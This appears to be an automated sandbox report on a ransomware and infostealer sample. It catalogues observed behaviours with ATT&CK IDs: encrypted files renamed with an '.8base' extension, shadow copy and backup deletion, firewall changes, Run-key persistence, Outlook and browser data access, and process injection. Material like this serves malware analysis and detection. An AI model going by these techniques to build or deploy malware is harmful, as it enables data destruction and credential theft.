ammyyadmin | 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636

pid	Process
2516	bcdedit.exe
1348	bcdedit.exe

Renames multiple (251) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

pid	Process
276	wbadmin.exe

Downloads MZ/PE file

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
3320	netsh.exe
4392	netsh.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	781D.exe
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	75DA.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\n6)ZqKc3{.exe	n6)ZqKc3{.exe

Executes dropped EXE 16 IoCs

pid	Process
1508	n6)ZqKc3{.exe
3176	pZW}X.exe
3548	n6)ZqKc3{.exe
212	pZW}X.exe
1516	n6)ZqKc3{.exe
2184	n6)ZqKc3{.exe
3756	6E45.exe
1080	705A.exe
4576	6E45.exe
4004	6E45.exe
5000	73A6.exe
5092	75DA.exe
4480	781D.exe
548	8405.exe
3604	Ynigope.exe
4452	Ynigope.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 12 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	aspnet_compiler.exe
Key opened	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	aspnet_compiler.exe
Key opened	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	aspnet_compiler.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\n6)ZqKc3{ = "C:\\Users\\Admin\\AppData\\Local\\n6)ZqKc3{.exe"	n6)ZqKc3{.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\n6)ZqKc3{ = "C:\\Users\\Admin\\AppData\\Local\\n6)ZqKc3{.exe"	n6)ZqKc3{.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\$Recycle.Bin\S-1-5-21-919254492-3979293997-764407192-1000\desktop.ini	n6)ZqKc3{.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-919254492-3979293997-764407192-1000\desktop.ini	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\desktop.ini	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	n6)ZqKc3{.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
99	ip-api.com

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 3796 set thread context of 4256	3796	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe	87
PID 3176 set thread context of 212	3176	pZW}X.exe	103
PID 1508 set thread context of 3548	1508	n6)ZqKc3{.exe	104
PID 1516 set thread context of 2184	1516	n6)ZqKc3{.exe	107
PID 3756 set thread context of 4004	3756	6E45.exe	127
PID 5000 set thread context of 4156	5000	73A6.exe	133
PID 5092 set thread context of 2888	5092	75DA.exe	139
PID 4480 set thread context of 3816	4480	781D.exe	138

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ppd.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp-ul-oob.xrm-ms	n6)ZqKc3{.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-80.png	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_heb.xml	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\pkeyconfig.companion.dll	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\it-IT\sqlxmlx.rll.mui	n6)ZqKc3{.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-100.png.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL115.XML	n6)ZqKc3{.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sr-latn-rs.dll.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\it-IT\msinfo32.exe.mui	n6)ZqKc3{.exe
File created	C:\Program Files\Java\jre1.8.0_66\bin\awt.dll.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe.config	n6)ZqKc3{.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\AirSpace.Etw.man.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\javafx-mx.jar	n6)ZqKc3{.exe
File created	C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_CopyNoDrop32x32.gif.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial2-ppd.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_KMS_Client_AE-ul-oob.xrm-ms	n6)ZqKc3{.exe
File created	C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.bat.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\7-Zip\Lang\va.txt	n6)ZqKc3{.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Retail-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Grace-ul-oob.xrm-ms	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Trial-ul-oob.xrm-ms	n6)ZqKc3{.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\CENTURY.TTF.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\7-Zip\Lang\si.txt	n6)ZqKc3{.exe
File created	C:\Program Files\Java\jdk1.8.0_66\bin\serialver.exe.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar	n6)ZqKc3{.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\OSFROAMINGPROXY.DLL	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\msvcp120.dll	n6)ZqKc3{.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTest-ppd.xrm-ms	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\plugin2\msvcr100.dll	n6)ZqKc3{.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected][4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Smokey Glass.eftx.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Trial-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-ul-phn.xrm-ms	n6)ZqKc3{.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_Subscription-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTrial-ppd.xrm-ms	n6)ZqKc3{.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Spatial.NetFX35.dll.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\api-ms-win-crt-convert-l1-1-0.dll	n6)ZqKc3{.exe
File created	C:\Program Files\Java\jdk1.8.0_66\db\bin\ij.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProMSDNR_Retail-pl.xrm-ms	n6)ZqKc3{.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesstylish.dotx.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\api-ms-win-core-timezone-l1-1-0.dll	n6)ZqKc3{.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar	n6)ZqKc3{.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Trial-pl.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\vccorlib140.dll	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Client\msvcr120.dll	n6)ZqKc3{.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O16ConsumerPerp_Bypass30-ppd.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial5-pl.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_ja.jar.id[4FB2A4D5-3483].[[email protected]].8base	n6)ZqKc3{.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Client\api-ms-win-core-file-l1-2-0.dll	n6)ZqKc3{.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
3860	548	WerFault.exe	132
4988	548	WerFault.exe	132

Checks SCSI registry key(s) 3 TTPs 7 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pZW}X.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pZW}X.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pZW}X.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	certreq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	certreq.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

pid	Process
3740	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3796	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
3796	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
3796	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
4256	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
4256	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
4256	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
4256	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
4796	certreq.exe
4796	certreq.exe
4796	certreq.exe
4796	certreq.exe
1508	n6)ZqKc3{.exe
3176	pZW}X.exe
212	pZW}X.exe
212	pZW}X.exe
1516	n6)ZqKc3{.exe
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3548	n6)ZqKc3{.exe
3548	n6)ZqKc3{.exe
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3548	n6)ZqKc3{.exe
3548	n6)ZqKc3{.exe
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE

Suspicious behavior: MapViewOfSection 11 IoCs

pid	Process
212	pZW}X.exe
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3796	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
Token: SeDebugPrivilege	1508	n6)ZqKc3{.exe
Token: SeDebugPrivilege	3176	pZW}X.exe
Token: SeDebugPrivilege	1516	n6)ZqKc3{.exe
Token: SeDebugPrivilege	3548	n6)ZqKc3{.exe
Token: SeBackupPrivilege	3664	vssvc.exe
Token: SeRestorePrivilege	3664	vssvc.exe
Token: SeAuditPrivilege	3664	vssvc.exe
Token: SeIncreaseQuotaPrivilege	3716	WMIC.exe
Token: SeSecurityPrivilege	3716	WMIC.exe
Token: SeTakeOwnershipPrivilege	3716	WMIC.exe
Token: SeLoadDriverPrivilege	3716	WMIC.exe
Token: SeSystemProfilePrivilege	3716	WMIC.exe
Token: SeSystemtimePrivilege	3716	WMIC.exe
Token: SeProfSingleProcessPrivilege	3716	WMIC.exe
Token: SeIncBasePriorityPrivilege	3716	WMIC.exe
Token: SeCreatePagefilePrivilege	3716	WMIC.exe
Token: SeBackupPrivilege	3716	WMIC.exe
Token: SeRestorePrivilege	3716	WMIC.exe
Token: SeShutdownPrivilege	3716	WMIC.exe
Token: SeDebugPrivilege	3716	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3716	WMIC.exe
Token: SeRemoteShutdownPrivilege	3716	WMIC.exe
Token: SeUndockPrivilege	3716	WMIC.exe
Token: SeManageVolumePrivilege	3716	WMIC.exe
Token: 33	3716	WMIC.exe
Token: 34	3716	WMIC.exe
Token: 35	3716	WMIC.exe
Token: 36	3716	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3716	WMIC.exe
Token: SeSecurityPrivilege	3716	WMIC.exe
Token: SeTakeOwnershipPrivilege	3716	WMIC.exe
Token: SeLoadDriverPrivilege	3716	WMIC.exe
Token: SeSystemProfilePrivilege	3716	WMIC.exe
Token: SeSystemtimePrivilege	3716	WMIC.exe
Token: SeProfSingleProcessPrivilege	3716	WMIC.exe
Token: SeIncBasePriorityPrivilege	3716	WMIC.exe
Token: SeCreatePagefilePrivilege	3716	WMIC.exe
Token: SeBackupPrivilege	3716	WMIC.exe
Token: SeRestorePrivilege	3716	WMIC.exe
Token: SeShutdownPrivilege	3716	WMIC.exe
Token: SeDebugPrivilege	3716	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3716	WMIC.exe
Token: SeRemoteShutdownPrivilege	3716	WMIC.exe
Token: SeUndockPrivilege	3716	WMIC.exe
Token: SeManageVolumePrivilege	3716	WMIC.exe
Token: 33	3716	WMIC.exe
Token: 34	3716	WMIC.exe
Token: 35	3716	WMIC.exe
Token: 36	3716	WMIC.exe
Token: SeBackupPrivilege	3736	wbengine.exe
Token: SeRestorePrivilege	3736	wbengine.exe
Token: SeSecurityPrivilege	3736	wbengine.exe
Token: SeShutdownPrivilege	3196	Explorer.EXE
Token: SeCreatePagefilePrivilege	3196	Explorer.EXE
Token: SeShutdownPrivilege	3196	Explorer.EXE
Token: SeCreatePagefilePrivilege	3196	Explorer.EXE
Token: SeDebugPrivilege	3756	6E45.exe
Token: SeDebugPrivilege	5000	73A6.exe
Token: SeDebugPrivilege	5092	75DA.exe
Token: SeDebugPrivilege	1080	705A.exe
Token: SeDebugPrivilege	4480	781D.exe
Token: SeDebugPrivilege	548	explorer.exe
Token: SeDebugPrivilege	4156	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3796 wrote to memory of 4148	3796	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe	86
PID 3796 wrote to memory of 4148	3796	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe	86
PID 3796 wrote to memory of 4148	3796	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe	86
PID 3796 wrote to memory of 4256	3796	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe	87
PID 3796 wrote to memory of 4256	3796	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe	87
PID 3796 wrote to memory of 4256	3796	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe	87
PID 3796 wrote to memory of 4256	3796	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe	87
PID 3796 wrote to memory of 4256	3796	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe	87
PID 3796 wrote to memory of 4256	3796	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe	87
PID 3796 wrote to memory of 4256	3796	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe	87
PID 3796 wrote to memory of 4256	3796	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe	87
PID 4256 wrote to memory of 4796	4256	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe	95
PID 4256 wrote to memory of 4796	4256	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe	95
PID 4256 wrote to memory of 4796	4256	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe	95
PID 4256 wrote to memory of 4796	4256	65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe	95
PID 3176 wrote to memory of 212	3176	pZW}X.exe	103
PID 3176 wrote to memory of 212	3176	pZW}X.exe	103
PID 3176 wrote to memory of 212	3176	pZW}X.exe	103
PID 3176 wrote to memory of 212	3176	pZW}X.exe	103
PID 3176 wrote to memory of 212	3176	pZW}X.exe	103
PID 3176 wrote to memory of 212	3176	pZW}X.exe	103
PID 1508 wrote to memory of 3548	1508	n6)ZqKc3{.exe	104
PID 1508 wrote to memory of 3548	1508	n6)ZqKc3{.exe	104
PID 1508 wrote to memory of 3548	1508	n6)ZqKc3{.exe	104
PID 1508 wrote to memory of 3548	1508	n6)ZqKc3{.exe	104
PID 1508 wrote to memory of 3548	1508	n6)ZqKc3{.exe	104
PID 1508 wrote to memory of 3548	1508	n6)ZqKc3{.exe	104
PID 1508 wrote to memory of 3548	1508	n6)ZqKc3{.exe	104
PID 1508 wrote to memory of 3548	1508	n6)ZqKc3{.exe	104
PID 1508 wrote to memory of 3548	1508	n6)ZqKc3{.exe	104
PID 1508 wrote to memory of 3548	1508	n6)ZqKc3{.exe	104
PID 1516 wrote to memory of 2184	1516	n6)ZqKc3{.exe	107
PID 1516 wrote to memory of 2184	1516	n6)ZqKc3{.exe	107
PID 1516 wrote to memory of 2184	1516	n6)ZqKc3{.exe	107
PID 1516 wrote to memory of 2184	1516	n6)ZqKc3{.exe	107
PID 1516 wrote to memory of 2184	1516	n6)ZqKc3{.exe	107
PID 1516 wrote to memory of 2184	1516	n6)ZqKc3{.exe	107
PID 1516 wrote to memory of 2184	1516	n6)ZqKc3{.exe	107
PID 1516 wrote to memory of 2184	1516	n6)ZqKc3{.exe	107
PID 1516 wrote to memory of 2184	1516	n6)ZqKc3{.exe	107
PID 1516 wrote to memory of 2184	1516	n6)ZqKc3{.exe	107
PID 3548 wrote to memory of 2880	3548	n6)ZqKc3{.exe	108
PID 3548 wrote to memory of 2880	3548	n6)ZqKc3{.exe	108
PID 3548 wrote to memory of 4736	3548	n6)ZqKc3{.exe	110
PID 3548 wrote to memory of 4736	3548	n6)ZqKc3{.exe	110
PID 4736 wrote to memory of 3320	4736	cmd.exe	112
PID 4736 wrote to memory of 3320	4736	cmd.exe	112
PID 2880 wrote to memory of 3740	2880	cmd.exe	113
PID 2880 wrote to memory of 3740	2880	cmd.exe	113
PID 2880 wrote to memory of 3716	2880	cmd.exe	116
PID 2880 wrote to memory of 3716	2880	cmd.exe	116
PID 4736 wrote to memory of 4392	4736	cmd.exe	117
PID 4736 wrote to memory of 4392	4736	cmd.exe	117
PID 2880 wrote to memory of 2516	2880	cmd.exe	118
PID 2880 wrote to memory of 2516	2880	cmd.exe	118
PID 2880 wrote to memory of 1348	2880	cmd.exe	119
PID 2880 wrote to memory of 1348	2880	cmd.exe	119
PID 2880 wrote to memory of 276	2880	cmd.exe	120
PID 2880 wrote to memory of 276	2880	cmd.exe	120
PID 3196 wrote to memory of 3756	3196	Explorer.EXE	125
PID 3196 wrote to memory of 3756	3196	Explorer.EXE	125
PID 3196 wrote to memory of 3756	3196	Explorer.EXE	125
PID 3196 wrote to memory of 1080	3196	Explorer.EXE	126
PID 3196 wrote to memory of 1080	3196	Explorer.EXE	126

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

description	ioc	Process
